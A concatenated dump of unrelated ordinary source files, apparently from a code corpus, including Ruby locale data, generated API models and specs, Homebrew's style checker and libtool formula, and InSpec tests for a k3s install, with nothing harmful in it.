@era_abbrs[:japanese]["83"] = "Daiji"
@era_abbrs[:japanese]["84"] = "Tenshō"
@era_abbrs[:japanese]["85"] = "Chōshō"
@era_abbrs[:japanese]["86"] = "Hoen"
@era_abbrs[:japanese]["87"] = "Eiji"
@era_abbrs[:japanese]["88"] = "Kōji"
@era_abbrs[:japanese]["89"] = "Tenyō"
@era_abbrs[:japanese]["9"] = "Jinki"
@era_abbrs[:japanese]["90"] = "Kyūan"
@era_abbrs[:japanese]["91"] = "Ninpei"
@era_abbrs[:japanese]["92"] = "Kyūju"
@era_abbrs[:japanese]["93"] = "Hogen"
@era_abbrs[:japanese]["94"] = "Heiji"
@era_abbrs[:japanese]["95"] = "Eiryaku"
@era_abbrs[:japanese]["96"] = "Ōho"
@era_abbrs[:japanese]["97"] = "Chōkan"
@era_abbrs[:japanese]["98"] = "Eiman"
@era_abbrs[:japanese]["99"] = "Nin-an"
@era_abbrs[:persian] = {}
@era_abbrs[:persian]["0"] = "AP"
@dateformats = {}
@dateformats[:buddhist] = {}
@dateformats[:buddhist]["full"] = "EEEE, MMMM d, yyyy G"
@dateformats[:buddhist]["long"] = "MMMM d, yyyy G"
@dateformats[:buddhist]["medium"] = "MMM d, yyyy G"
@dateformats[:buddhist]["short"] = "M/d/yyyy"
@dateformats[:chinese] = {}
@dateformats[:chinese]["full"] = "EEEE y'x'G-Ml-d"
@dateformats[:chinese]["long"] = "y'x'G-Ml-d"
@dateformats[:chinese]["medium"] = "y'x'G-Ml-d"
@dateformats[:chinese]["short"] = "y'x'G-Ml-d"
@dateformats[:gregorian] = {}
@dateformats[:gregorian]["full"] = "EEEE dd MMMM yyyy"
@dateformats[:gregorian]["long"] = "d. MMM yyyy"
@dateformats[:gregorian]["medium"] = "dd-MM-yyyy"
@dateformats[:gregorian]["short"] = "dd-MM-yy"
@dateformats[:japanese] = {}
@dateformats[:japanese]["full"] = "EEEE, MMMM d, y G"
@dateformats[:japanese]["long"] = "MMMM d, y G"
@dateformats[:japanese]["medium"] = "MMM d, y G"
@dateformats[:japanese]["short"] = "M/d/yy"
@dateformat_defaults = {}
@dateformat_defaults["buddhist"] = "medium"
@dateformat_defaults["chinese"] = "medium"
@dateformat_defaults["gregorian"] = "medium"
@dateformat_defaults["japanese"] = "medium"
@timeformats = {}
@timeformats[:buddhist] = {}
@timeformats[:buddhist]["full"] = "h:mm:ss a z"
@timeformats[:buddhist]["long"] = "h:mm:ss a z"
@timeformats[:buddhist]["medium"] = "h:mm:ss a"
@timeformats[:buddhist]["short"] = "h:mm a"
@timeformats[:chinese] = {}
@timeformats[:chinese]["full"] = "h:mm:ss a z"
@timeformats[:chinese]["long"] = "h:mm:ss a z"
@timeformats[:chinese]["medium"] = "h:mm:ss a"
@timeformats[:chinese]["short"] = "h:mm a"
@timeformats[:gregorian] = {}
@timeformats[:gregorian]["full"] = "HH:mm:ss z"
@timeformats[:gregorian]["long"] = "HH:mm:ss z"
@timeformats[:gregorian]["medium"] = "HH:mm:ss"
@timeformats[:gregorian]["short"] = "HH:mm"
@timeformats[:japanese] = {}
@timeformats[:japanese]["full"] = "h:mm:ss a z"
@timeformats[:japanese]["long"] = "h:mm:ss a z"
@timeformats[:japanese]["medium"] = "h:mm:ss a"
@timeformats[:japanese]["short"] = "h:mm a"
@timeformat_defaults = {}
@timeformat_defaults["buddhist"] = "medium"
@timeformat_defaults["chinese"] = "medium"
@timeformat_defaults["gregorian"] = "medium"
@timeformat_defaults["japanese"] = "medium"
@datetimeformats = {}
@datetimeformats["buddhist"] = "{1} {0}"
@datetimeformats["chinese"] = "{1} {0}"
@datetimeformats["gregorian"] = "{1} {0}"
@datetimeformats["japanese"] = "{1} {0}"
@fields = {}
@fields[:gregorian] = {}
@fields[:gregorian]["day"] = "Day"
@fields[:gregorian]["dayperiod"] = "Dayperiod"
@fields[:gregorian]["era"] = "Era"
@fields[:gregorian]["hour"] = "Hour"
@fields[:gregorian]["minute"] = "Minute"
@fields[:gregorian]["month"] = "Month"
@fields[:gregorian]["second"] = "Second"
@fields[:gregorian]["week"] = "Week"
@fields[:gregorian]["weekday"] = "Day of the Week"
@fields[:gregorian]["year"] = "Year"
@fields[:gregorian]["zone"] = "Zone"
@field_relatives = {}
end
public
# Read-only accessors exposing the locale data populated by #init_data above.
attr_reader :localized_pattern_characters
attr_reader :default
attr_reader :months
attr_reader :monthformat_defaults
attr_reader :days
attr_reader :dayformat_defaults
attr_reader :week_firstdays
attr_reader :weekend_starts
attr_reader :weekend_ends
attr_reader :mindays
attr_reader :am
attr_reader :pm
attr_reader :era_names
attr_reader :era_abbrs
attr_reader :dateformats
attr_reader :dateformat_defaults
attr_reader :timeformats
attr_reader :timeformat_defaults
attr_reader :datetimeformats
attr_reader :fields
attr_reader :field_relatives
| 42.507092 | 67 | 0.58626 |
e9611eb347ddcf808ff0333b4659899ab8fe4510 | 6,119 | =begin
#NSX-T Data Center Policy API
#VMware NSX-T Data Center Policy REST API
OpenAPI spec version: 3.1.0.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.19
=end
require 'date'
module NSXTPolicy
# Query statistics counters to an upstream server including successfully forwarded queries and failed queries.
class NsxTUpstreamServerStatistics
# Queries failed to forward.
attr_accessor :queries_failed
# Upstream server ip
attr_accessor :upstream_server
# Queries forwarded successfully
attr_accessor :queries_succeeded
# Attribute mapping from ruby-style variable name to JSON key.
# Attribute mapping from ruby-style variable name to JSON key.
# For this model the two naming schemes coincide, so each name maps to itself.
def self.attribute_map
  %i[queries_failed upstream_server queries_succeeded].map { |name| [name, name] }.to_h
end
# Attribute type mapping.
# Attribute type mapping, consumed by the generic deserializer.
def self.swagger_types
  names = %i[queries_failed upstream_server queries_succeeded]
  names.zip(%i[Integer String Integer]).to_h
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'queries_failed')
self.queries_failed = attributes[:'queries_failed']
end
if attributes.has_key?(:'upstream_server')
self.upstream_server = attributes[:'upstream_server']
end
if attributes.has_key?(:'queries_succeeded')
self.queries_succeeded = attributes[:'queries_succeeded']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
# Lists property violations; this model declares no field constraints,
# so the result is always empty.
# @return [Array] empty array
def list_invalid_properties
  []
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
# No field-level constraints exist for this model, so it is always valid.
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
queries_failed == o.queries_failed &&
upstream_server == o.upstream_server &&
queries_succeeded == o.queries_succeeded
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
# Delegates to #== so Hash-key equality agrees with value equality.
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[queries_failed, upstream_server, queries_succeeded].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = NSXTPolicy.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 29.560386 | 113 | 0.631149 |
bf5bd2e0f4d2bf4f22c98888123bf5adaab4c920 | 1,392 | # frozen_string_literal: true
# Provide service methods for getting a list of all authorities and scenarios for an authority.
module QaServer
  class AuthorityListerService
    class << self
      # Names of all supported linked-data authorities.
      # @return [Array<String>] list of authorities
      def authorities_list
        Qa::LinkedData::AuthorityService.authority_names
      end

      # Fill in status_log with data about each scenario for an authority.
      # @param authority_name [String] the name of the authority
      # @param status_log [ScenarioLogger] the log that will hold the data about the scenarios
      def scenarios_list(authority_name:, status_log:)
        scenarios = QaServer::ScenariosLoaderService.load(authority_name: authority_name, status_log: status_log)
        return if scenarios.blank?

        list_terms(scenarios, status_log)
        list_searches(scenarios, status_log)
      end

      private

      # Logs every term scenario without executing it.
      def list_terms(scenarios, status_log)
        scenarios.term_scenarios.each do |scenario|
          QaServer::TermScenarioValidator.new(scenario: scenario, status_log: status_log).log_without_running
        end
      end

      # Logs every search scenario without executing it.
      def list_searches(scenarios, status_log)
        scenarios.search_scenarios.each do |scenario|
          QaServer::SearchScenarioValidator.new(scenario: scenario, status_log: status_log).log_without_running
        end
      end
    end
  end
end
| 43.5 | 154 | 0.770115 |
ac62c856759e6f7b50a03432bf2c3064c3a243d9 | 70 | # add custom rake tasks here
# Smoke-test task: running `rake foo` prints 1, confirming the Rakefile loads.
desc 'test it'
task :foo do
puts 1
end
| 11.666667 | 28 | 0.7 |
61039e30aa13acf27fc6de6d3e8e08cd76ff66cb | 730 | module FE
class Document
class Regulation < Element
  include ActiveModel::Validations

  # Resolution number and date of the tax-authority (DGT) regulation that
  # the electronic document references.
  attr_accessor :number, :date

  validates :number, presence: true
  validates :date, presence: true

  # @param args [Hash] optional :number and :date overrides.
  # Fix: read the defaults with `||` instead of `||=`; the previous `||=`
  # wrote the default values back into the caller's options hash.
  def initialize(args = {})
    @number = args[:number] || "DGT-R-48-2016"
    @date = args[:date] || "20-02-2017 13:22:22"
  end

  # Appends the <Normativa> element (number and date) to the XML builder.
  # @param node [Nokogiri::XML::Builder, nil] builder to append to; a fresh one is created when nil
  # @param document [Object] owning document (currently unused here)
  # @raise [FE::Error] when the regulation fails validation
  def build_xml(node, document)
    raise FE::Error.new("regulation invalid", class: self.class, messages: errors.messages) unless valid?

    node = Nokogiri::XML::Builder.new if node.nil?
    node.Normativa do |xml|
      xml.NumeroResolucion @number
      xml.FechaResolucion @date
    end
  end
end
end
end | 28.076923 | 108 | 0.59726 |
e8121414cae83d27692d479286b703cbea35acb0 | 382 | class CreateApiUsersSupportAppPermission < ActiveRecord::Migration
# Lightweight model scoped to this migration, so the data change does not
# depend on the application's current SupportedPermission class.
class SupportedPermission < ApplicationRecord
belongs_to :application, class_name: "Doorkeeper::Application"
end
# Grants the "api_users" permission to the Support application when that
# application exists; no-op otherwise.
def up
  support = ::Doorkeeper::Application.find_by(name: "Support")
  # Single guard; the original wrapped this call in `if support` twice.
  SupportedPermission.create!(application: support, name: "api_users") if support
end
end
| 29.384615 | 85 | 0.759162 |
1a6591f59458ed2df453eb49fdd29e8777237378 | 145 | class AddOtherOrganisationToUsers < ActiveRecord::Migration[4.2]
# Adds users.other_organisation, a free-text organisation name.
def change
add_column :users, :other_organisation, :string
end
end
| 24.166667 | 65 | 0.751724 |
e2bdf39926caba0379169520036555288ec562a5 | 4,934 | =begin
#Accounting API
#No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator)
The version of the OpenAPI document: 2.1.3
Contact: [email protected]
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 4.3.0
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for XeroRuby::Accounting::Quote
# Automatically generated by openapi-generator (https://openapi-generator.tech)
# Please update as you see appropriate
describe 'Quote' do
  before do
    # run before each test
    @instance = XeroRuby::Accounting::Quote.new
  end

  after do
    # run after each test
  end

  describe 'test an instance of Quote' do
    it 'should create an instance of Quote' do
      expect(@instance).to be_instance_of(XeroRuby::Accounting::Quote)
    end
  end

  # The generator emitted an identical empty placeholder example for every
  # model attribute, so the describe blocks are produced in a loop here.
  %w[
    quote_id quote_number reference terms contact line_items date date_string
    expiry_date expiry_date_string status currency_code currency_rate
    sub_total total_tax total total_discount title summary branding_theme_id
    updated_date_utc line_amount_types
  ].each do |attribute|
    describe "test attribute \"#{attribute}\"" do
      it 'should work' do
        # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
      end
    end
  end
end
| 29.369048 | 107 | 0.707134 |
91bc2afaad5d52bb506d5923a6cc5bd6c968aec0 | 941 | require "rails_helper"
RSpec.describe ContactPreferenceController do
# The step object the controller assigned during the request.
let(:step) { assigns(:step) }
# Params missing every permitted field, used by the shared examples below.
let(:invalid_params) { { step: { blah: "" } } }
let(:step_class) { ContactPreference }
# Scope every request to a freshly created SNAP application.
before { session[:snap_application_id] = current_app.id }
include_examples "step controller", "param validation"
describe "#edit" do
it "assigns the fields to the step" do
get :edit
expect(step.sms_consented).to eq false
end
end
describe "#update" do
context "when valid" do
it "updates the current app and redirects to the next step" do
valid_params = { sms_consented: "true" }
put :update, params: { step: valid_params }
expect(current_app.reload.sms_consented).to eq true
expect(response).to redirect_to("/steps/contact-confirm-phone-number")
end
end
end
# Memoized test subject: an application that has not consented to SMS.
def current_app
@_current_app ||= create(:snap_application, sms_consented: false)
end
end
| 25.432432 | 78 | 0.676939 |
916d3bc64f1e7455542a89f2ac3ef0bd49b802b0 | 9,141 | # typed: false
# frozen_string_literal: true
require "shellwords"
module Homebrew
# Helper module for running RuboCop.
#
# @api private
module Style
module_function
# Checks style for a list of files, printing simple RuboCop output.
# Returns true if no violations were found, false otherwise.
# (The previous comment had this inverted: a truthy result means the
# underlying tools exited successfully, i.e. the style check passed.)
def check_style_and_print(files, **options)
  success = check_style_impl(files, :print, **options)

  # On GitHub Actions, additionally surface each offense as an inline
  # error annotation on the affected file/line.
  if ENV["GITHUB_ACTIONS"] && !success
    check_style_json(files, **options).each do |path, offenses|
      offenses.each do |o|
        line = o.location.line
        # Fix: this previously read `o.location.line` again, so every
        # annotation was rendered at the wrong column.
        column = o.location.column
        annotation = GitHub::Actions::Annotation.new(:error, o.message, file: path, line: line, column: column)
        puts annotation if annotation.relevant?
      end
    end
  end

  success
end
# Checks style for a list of files, returning results as an {Offenses}
# object parsed from its JSON output.
# Thin wrapper over check_style_impl with the :json output type.
def check_style_json(files, **options)
check_style_impl(files, :json, **options)
end
# Shared implementation for both the printing and JSON style checks.
# Splits the given files into shell sources (checked with shellcheck) and
# Ruby sources (checked with RuboCop) and merges the two results.
def check_style_impl(files, output_type,
fix: false,
except_cops: nil, only_cops: nil,
display_cop_names: false,
reset_cache: false,
debug: false, verbose: false)
raise ArgumentError, "Invalid output type: #{output_type.inspect}" unless [:print, :json].include?(output_type)
# The `brew` binary itself and *.sh files count as shell sources.
shell_files, ruby_files =
Array(files).map(&method(:Pathname))
.partition { |f| f.realpath == HOMEBREW_BREW_FILE.realpath || f.extname == ".sh" }
# Skip RuboCop entirely when only shell files were given.
rubocop_result = if shell_files.any? && ruby_files.none?
output_type == :json ? [] : true
else
run_rubocop(ruby_files, output_type,
fix: fix,
except_cops: except_cops, only_cops: only_cops,
display_cop_names: display_cop_names,
reset_cache: reset_cache,
debug: debug, verbose: verbose)
end
# Likewise skip shellcheck when only Ruby files were given.
shellcheck_result = if ruby_files.any? && shell_files.none?
output_type == :json ? [] : true
else
run_shellcheck(shell_files, output_type)
end
# JSON mode merges both offense lists; print mode succeeds only when both did.
if output_type == :json
Offenses.new(rubocop_result + shellcheck_result)
else
rubocop_result && shellcheck_result
end
end
# Runs RuboCop (with Homebrew's custom cops loaded) over the given files.
# :print streams human-readable output and returns a Boolean success flag;
# :json returns the per-file offense data parsed from RuboCop's JSON
# formatter output.
def run_rubocop(files, output_type,
fix: false, except_cops: nil, only_cops: nil, display_cop_names: false, reset_cache: false,
debug: false, verbose: false)
Homebrew.install_bundler_gems!
require "rubocop"
require "rubocops"
args = %w[
--force-exclusion
]
# Auto-correct (-A) runs serially; otherwise use RuboCop's parallel mode.
args << if fix
"-A"
else
"--parallel"
end
args += ["--extra-details"] if verbose
args += ["--display-cop-names"] if display_cop_names || verbose
# Resolve cop name abbreviations, keeping only cops/departments that the
# RuboCop registry actually knows about.
if except_cops
except_cops.map! { |cop| RuboCop::Cop::Cop.registry.qualified_cop_name(cop.to_s, "") }
cops_to_exclude = except_cops.select do |cop|
RuboCop::Cop::Cop.registry.names.include?(cop) ||
RuboCop::Cop::Cop.registry.departments.include?(cop.to_sym)
end
args << "--except" << cops_to_exclude.join(",") unless cops_to_exclude.empty?
elsif only_cops
only_cops.map! { |cop| RuboCop::Cop::Cop.registry.qualified_cop_name(cop.to_s, "") }
cops_to_include = only_cops.select do |cop|
RuboCop::Cop::Cop.registry.names.include?(cop) ||
RuboCop::Cop::Cop.registry.departments.include?(cop.to_sym)
end
odie "RuboCops #{only_cops.join(",")} were not found" if cops_to_include.empty?
args << "--only" << cops_to_include.join(",")
end
# Files inside Homebrew's own library are Homebrew sources, not formulae.
has_non_formula = files.any? do |file|
File.expand_path(file).start_with? HOMEBREW_LIBRARY_PATH
end
# Formula-only runs use Homebrew's bundled config (the RSpec variant when
# a spec directory is present); otherwise RuboCop discovers configs itself.
if files.any? && !has_non_formula
config = if files.first && File.exist?("#{files.first}/spec")
HOMEBREW_LIBRARY/".rubocop_rspec.yml"
else
HOMEBREW_LIBRARY/".rubocop.yml"
end
args << "--config" << config
end
# With no explicit files, lint Homebrew's own library.
if files.blank?
args << HOMEBREW_LIBRARY_PATH
else
args += files
end
# Keep RuboCop's result cache inside Homebrew's cache directory.
cache_env = { "XDG_CACHE_HOME" => "#{HOMEBREW_CACHE}/style" }
FileUtils.rm_rf cache_env["XDG_CACHE_HOME"] if reset_cache
ruby_args = [
(ENV["HOMEBREW_RUBY_WARNINGS"] if !debug && !verbose),
"-S",
"rubocop",
].compact.freeze
case output_type
when :print
args << "--debug" if debug
# Don't show the default formatter's progress dots
# on CI or if only checking a single file.
args << "--format" << "clang" if ENV["CI"] || files.count { |f| !f.directory? } == 1
args << "--color" if Tty.color?
system cache_env, RUBY_PATH, *ruby_args, *args
$CHILD_STATUS.success?
when :json
result = system_command RUBY_PATH,
args: [*ruby_args, "--format", "json", *args],
env: cache_env
json = json_result!(result)
json["files"]
end
end
# Runs shellcheck over the given shell files, installing shellcheck on
# demand when it cannot be found. :print returns a Boolean; :json returns
# per-file offense hashes reshaped to match RuboCop's JSON output.
def run_shellcheck(files, output_type)
# Prefer an installed formula, then anything on PATH, then install it.
shellcheck = Formula["shellcheck"].opt_bin/"shellcheck" if Formula["shellcheck"].any_version_installed?
shellcheck ||= which("shellcheck")
shellcheck ||= which("shellcheck", ENV["HOMEBREW_PATH"])
shellcheck ||= begin
ohai "Installing `shellcheck` for shell style checks..."
safe_system HOMEBREW_BREW_FILE, "install", "shellcheck"
Formula["shellcheck"].opt_bin/"shellcheck"
end
# Default to checking brew itself plus Homebrew's own shell sources.
if files.empty?
files = [
HOMEBREW_BREW_FILE,
# TODO: HOMEBREW_REPOSITORY/"completions/bash/brew",
*Pathname.glob("#{HOMEBREW_LIBRARY}/Homebrew/*.sh"),
*Pathname.glob("#{HOMEBREW_LIBRARY}/Homebrew/cmd/*.sh"),
*Pathname.glob("#{HOMEBREW_LIBRARY}/Homebrew/utils/*.sh"),
]
end
args = ["--shell=bash", "--", *files] # TODO: Add `--enable=all` to check for more problems.
case output_type
when :print
system shellcheck, "--format=tty", *args
$CHILD_STATUS.success?
when :json
result = system_command shellcheck, args: ["--format=json", *args]
json = json_result!(result)
# Convert to same format as RuboCop offenses.
severity_hash = { "style" => "refactor", "info" => "convention" }
json.group_by { |v| v["file"] }
.map do |k, v|
{
"path" => k,
"offenses" => v.map do |o|
o.delete("file")
# shellcheck codes become pseudo cop names, e.g. "SC2086".
o["cop_name"] = "SC#{o.delete("code")}"
level = o.delete("level")
o["severity"] = severity_hash.fetch(level, level)
line = o.delete("line")
column = o.delete("column")
o["corrected"] = false
o["correctable"] = o.delete("fix").present?
o["location"] = {
"start_line" => line,
"start_column" => column,
"last_line" => o.delete("endLine"),
"last_column" => o.delete("endColumn"),
"line" => line,
"column" => column,
}
o
end,
}
end
end
end
# Parses a command result's stdout as JSON.
# An exit status of 1 only means violations were found, so it is tolerated;
# any other non-zero status — or stdout too short to be JSON — raises via
# the result's own assert_success!.
def json_result!(result)
  exitstatus = result.status.exitstatus
  tolerable_status = (0..1).cover?(exitstatus)
  # Valid JSON output is at least 2 characters (e.g. "{}" or "[]").
  plausible_json = result.stdout.length >= 2
  result.assert_success! unless tolerable_status && plausible_json
  JSON.parse(result.stdout)
end
# Collection of style offenses, keyed by resolved file path.
class Offenses
  include Enumerable

  # @param paths [Array<Hash>] per-file results, each with "path" and
  #   "offenses" keys (the RuboCop JSON formatter shape).
  def initialize(paths)
    @offenses = paths.each_with_object({}) do |file_result, by_path|
      offense_list = file_result["offenses"]
      # Clean files contribute nothing.
      next if offense_list.empty?

      resolved_path = Pathname(file_result["path"]).realpath
      by_path[resolved_path] = offense_list.map { |attrs| Offense.new(attrs) }
    end
  end

  # Offenses recorded for the given path (empty when the file is clean).
  def for_path(path)
    @offenses.fetch(Pathname(path), [])
  end

  def each(*args, &block)
    @offenses.each(*args, &block)
  end
end
# A single style offense reported by RuboCop or shellcheck.
class Offense
  attr_reader :severity, :message, :corrected, :location, :cop_name

  # @param json [Hash] one offense hash from the JSON output
  def initialize(json)
    @severity, @message, @cop_name, @corrected =
      json.values_at("severity", "message", "cop_name", "corrected")
    @location = LineLocation.new(json["location"])
  end

  # One-letter code for the severity, e.g. "C" for convention.
  def severity_code
    severity[0].upcase
  end

  def corrected?
    corrected
  end
end
# Source location of a style offense.
class LineLocation
  extend T::Sig

  attr_reader :line, :column

  # @param json [Hash] location hash with "line" and "column" keys
  def initialize(json)
    # Pull both coordinates out of the parsed offense hash in one go.
    @line, @column = json.values_at("line", "column")
  end

  sig { returns(String) }
  def to_s
    "#{line}: col #{column}"
  end
end
end
end
| 30.368771 | 117 | 0.564271 |
7ab6a9ab2e631c0ac57b4e8dfc6e932eb84ef787 | 2,644 | class Libtool < Formula
desc "Generic library support script"
homepage "https://www.gnu.org/software/libtool/"
url "https://ftp.gnu.org/gnu/libtool/libtool-2.4.6.tar.xz"
mirror "https://ftpmirror.gnu.org/libtool/libtool-2.4.6.tar.xz"
sha256 "7c87a8c2c8c0fc9cd5019e402bed4292462d00a718a7cd5f11218153bf28b26f"
# NOTE(review): the rebuild revision differs per platform — presumably
# Linux-only rebuilds happened; confirm before bumping either value.
revision OS.mac? ? 2 : 4
bottle do
cellar :any
sha256 "af317b35d0a394b7ef55fba4950735b0392d9f31bececebf9c412261c23a01fc" => :catalina
sha256 "77ca68934e7ed9b9b0b8ce17618d7f08fc5d5a95d7b845622bf57345ffb1c0d6" => :mojave
sha256 "60c7d86f9364e166846f8d3fb2ba969e6ca157e7ecbbb42a1de259116618c2ba" => :high_sierra
sha256 "a0789f8180632aff54aaf7cc276d7c4fe4e7b10f18a949256b87b111c1d8ee26" => :x86_64_linux
end
uses_from_macos "m4" => :build
# Fixes the build on macOS 11:
# https://lists.gnu.org/archive/html/libtool-patches/2020-06/msg00001.html
patch :p0 do
url "https://github.com/Homebrew/formula-patches/raw/e5fbd46a25e35663059296833568667c7b572d9a/libtool/dynamic_lookup-11.patch"
sha256 "5ff495a597a876ce6e371da3e3fe5dd7f78ecb5ebc7be803af81b6f7fcef1079"
end
# Builds and installs libtool; on macOS the programs get a "g" prefix to
# avoid clashing with Apple's own libtool.
def install
# Ensure configure is happy with the patched files
%w[aclocal.m4 libltdl/aclocal.m4 Makefile.in libltdl/Makefile.in
config-h.in libltdl/config-h.in configure libltdl/configure].each do |file|
touch file
end
ENV["SED"] = "sed" # prevent libtool from hardcoding sed path from superenv
system "./configure", "--disable-dependency-tracking",
"--prefix=#{prefix}",
("--program-prefix=g" if OS.mac?),
"--enable-ltdl-install"
system "make", "install"
# NOTE(review): on macOS the binaries are already installed g-prefixed by
# --program-prefix; verify these symlinks behave as intended there.
bin.install_symlink "libtool" => "glibtool"
bin.install_symlink "libtoolize" => "glibtoolize"
# Avoid references to the Homebrew shims directory
inreplace bin/"libtool", HOMEBREW_SHIMS_PATH/"linux/super/", "/usr/bin/" unless OS.mac?
end
# Post-install message explaining the "g" prefix on the executables.
def caveats
<<~EOS
In order to prevent conflicts with Apple's own libtool we have prepended a "g"
so, you have instead: glibtool and glibtoolize.
EOS
end
# Formula test: run a trivial program through glibtool, then use it to
# compile and link a C hello-world program.
test do
system "#{bin}/glibtool", "execute", File.executable?("/usr/bin/true") ? "/usr/bin/true" : "/bin/true"
(testpath/"hello.c").write <<~EOS
#include <stdio.h>
int main() { puts("Hello, world!"); return 0; }
EOS
system bin/"glibtool", "--mode=compile", "--tag=CC",
ENV.cc, "-c", "hello.c", "-o", "hello.o"
system bin/"glibtool", "--mode=link", "--tag=CC",
ENV.cc, "hello.o", "-o", "hello"
assert_match "Hello, world!", shell_output("./hello")
end
end
| 38.882353 | 130 | 0.68646 |
21bf284a856c0559830025981a5cf6c200ac1ecd | 138 | # frozen_string_literal: true
FactoryBot.define do
factory :sub_item do
# Implicit declaration: resolves to the :item factory as an association.
item
# Implicit declaration: resolves to a factory/sequence named :title defined
# elsewhere — NOTE(review): verify a global :title sequence exists.
title
sequence(:position) { |n| n }
end
end
| 13.8 | 33 | 0.673913 |
e9cf862bb99ec5daf4b425965a3cf5cf423767aa | 3,636 | # Task file for tests
# InSpec controls validating the k3s install tasks (tasks/install.yml):
# prerequisites, binary, service unit, certificates and API reachability.
ref_file = 'tasks/install.yml'
control 'install-01' do
title 'Install Openshift Python module'
impact 'low'
ref ref_file
describe command('pip3 show openshift') do
its('stdout') { should match(/Name: openshift/) }
its('exit_status') { should eq 0 }
end
end
control 'install-02' do
title 'Download K3s binary'
impact 'high'
ref ref_file
describe file('/usr/local/bin/k3s') do
it { should exist }
its('owner') { should eq 'root' }
its('group') { should eq 'root' }
its('mode') { should cmp '0755' }
end
describe command('k3s') do
it { should exist }
end
end
control 'install-03' do
title 'Manage service'
impact 'high'
ref ref_file
describe file('/etc/systemd/system/k3s.service') do
it { should exist }
its('owner') { should eq 'root' }
its('group') { should eq 'root' }
its('mode') { should cmp '0644' }
its('selinux_label') { should eq 'system_u:object_r:systemd_unit_file_t:s0' }
end
end
control 'install-04' do
title 'Manage sysconfig'
impact 'high'
ref ref_file
describe file('/etc/sysconfig/k3s') do
it { should exist }
its('owner') { should eq 'root' }
its('group') { should eq 'root' }
its('mode') { should cmp '0644' }
its('selinux_label') { should eq 'system_u:object_r:etc_t:s0' }
end
end
control 'install-05' do
title 'Ensure k3s is running'
impact 'high'
ref ref_file
describe systemd_service('k3s') do
it { should be_installed }
it { should be_enabled }
it { should be_running }
end
# 6443 is the Kubernetes API server port.
describe port(6443) do
it { should be_listening }
its('protocols') { should include 'tcp' }
its('addresses') { should include '0.0.0.0' }
end
end
control 'install-06' do
title 'Wait for node token to be generated'
impact 'medium'
ref ref_file
describe file('/var/lib/rancher/k3s/server/node-token') do
it { should exist }
end
end
control 'install-07' do
title 'Store k3s certificates'
impact 'medium'
ref ref_file
certificate = '/etc/kubernetes/ca-certificate.pem'
describe file(certificate) do
it { should exist }
its('owner') { should eq 'root' }
its('group') { should eq 'root' }
its('mode') { should cmp '0644' }
end
describe x509_certificate(certificate) do
its('extensions.keyUsage') { should include 'Digital Signature' }
its('extensions.keyUsage') { should include 'Key Encipherment' }
its('extensions.keyUsage') { should include 'Certificate Sign' }
end
end
control 'install-08' do
title 'Ensure k3s certificates are included in system truststore'
impact 'low'
ref ref_file
# The truststore anchor must be a symlink back to the exported CA cert.
anchor = '/etc/pki/ca-trust/source/anchors/k3s.crt'
certificate = '/etc/kubernetes/ca-certificate.pem'
describe file(anchor) do
it { should exist }
its('link_path') { should eq certificate }
end
end
control 'install-09' do
title 'K3s is able to communicate with client'
impact 'high'
ref ref_file
# Test connection from CLI client
describe command('/usr/local/bin/k3s kubectl version') do
its('exit_status') { should eq 0 }
its('stdout') { should match 'Server Version' }
end
# Load k3s authentication
config = YAML.safe_load(file('/etc/rancher/k3s/k3s.yaml').content)
credentials = config['users'][0]['user']
